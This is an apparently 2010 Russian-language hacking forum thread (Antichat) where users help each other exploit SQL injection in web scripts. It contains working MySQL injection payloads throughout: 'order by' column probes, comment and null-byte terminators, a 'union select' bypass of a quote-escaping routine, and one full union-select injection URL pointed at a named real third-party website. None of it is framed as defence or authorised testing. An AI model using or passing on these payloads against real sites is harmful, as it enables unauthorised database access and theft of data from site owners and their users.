 |
|
20.04.2010, 21:40
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от YuNi|[c
привет посоветуйте как тут поступит:
на запрос localhost/script.php?id=1'+order+by+1+--+
ответ:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'order+by+1+--+', now())'
at line 2
вот никак не могу раскрутит еще добавка now())'
localhost/script.php?id=1'%20order%20by%201--
|
|
|
20.04.2010, 22:34
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
спс попугай но все еще остался now())
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2
|
|
|
|
21.04.2010, 01:22
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от YuNi|[c
спс попугай но все еще остался now())
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2
попробуй пробелы поставить до и\или после двух тире, либо /* заюзай, или нульбайтом отрежь на крайний случай.
А вообще, похоже ошибка идет во втором запросе, видимо.
|
|
|
|
21.04.2010, 07:53
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
%23, #, /*.
1' order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
1 order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
С ковычкой без и т.п.
|
|
|
|
21.04.2010, 11:59
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
99% что это инсерт или апдейт. Крутить соответственно
|
|
|
|
21.04.2010, 14:07
|
|
Новичок
Регистрация: 30.04.2009
Сообщений: 9
С нами:
8963907
Репутация:
0
|
|
Господа, есть варианты обхода экранирования ?)
statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';
function QuoteParam(s : string) : string;
{ на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
var
i : integer;
Dest : string;
begin
Dest := '"';
for i:=1 to length(s) do
case s[i] of
'''' : Dest := Dest + '\''';
'"' : Dest := Dest + '\"';
'\' : Dest := Dest + '\\';
else Dest := Dest + s[i];
end;
QuoteParam := Dest + '"';
end;
+ к переменной можно добавить intval()
|
|
|
|
21.04.2010, 14:10
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Как бы там кавычки не мешаються, name= dasjkhasdjkhsjkhasdkhkajh union select 1, etc...
|
|
|
|
21.04.2010, 18:55
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
|
|
|
|
21.04.2010, 19:12
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
pinch:
http://www.alpharent.gr/gr/offers.php?id=-1+union+/*!select*/+0,1,2,3
|
|
|
|
21.04.2010, 19:29
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
Какой функцией нужно делать поиск по БД?
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
|
|
|
|
Похожие темы
Линейный вид
